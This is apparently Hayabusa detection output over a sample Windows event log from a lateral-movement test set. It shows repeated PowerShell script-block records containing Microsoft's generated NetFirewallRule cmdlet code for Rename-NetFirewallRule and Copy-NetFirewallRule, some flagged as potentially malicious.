[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 